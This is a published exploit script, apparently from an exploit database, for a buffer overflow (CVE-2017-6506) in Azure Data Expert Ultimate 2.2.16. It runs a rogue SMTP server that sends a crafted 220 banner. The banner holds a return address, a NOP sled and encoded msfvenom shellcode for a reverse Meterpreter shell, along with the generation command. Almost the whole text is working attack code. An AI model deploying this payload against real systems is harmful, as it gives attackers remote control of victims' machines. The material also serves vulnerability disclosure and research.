Azure Data Expert Ultimate 2.2.16 Buffer Overflow

`# Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow  
# Date: 2017-03-07  
# Exploit Author: Peter Baris  
# Vendor Homepage: http://www.saptech-erp.com.au  
# Software Link: http://www.azuredex.com/downloads.html  
# Version: 2.2.16  
# Tested on: Windows Server 2008 R2 Standard x64  
# CVE : CVE-2017-6506  
  
# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.  
  
import socket  
  
# QtGui4.dll 0x6527635E - CALL ESP  
jmp = "\x5e\x63\x27\x65"  
nops = "\x90"*8  
  
  
# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20   
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest  
  
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"  
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"  
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"  
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"  
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"  
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"  
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"  
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"  
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"  
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"  
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"  
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"  
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"  
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"  
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"  
"\xc1\x48\x45\x0e\x32\x6b\x4c")  
  
  
rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"  
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"  
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"  
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"  
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"  
"\xe2\x79\xdc\x2d\x97\x97")  
  
  
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1  
port = 25  
s = socket.socket()  
ip = '0.0.0.0'   
s.bind((ip, port))   
s.listen(5)   
  
  
print 'Listening on SMTP port: '+str(port)  
if len(rev_met_1) >= 236:  
print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')  
exit(1)   
elif len(rev_met_2) >= 76:  
print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')  
exit(1)  
  
while True:  
conn, addr = s.accept()   
conn.send('220 '+buffer+'\r\n')  
conn.close()  
  
  
`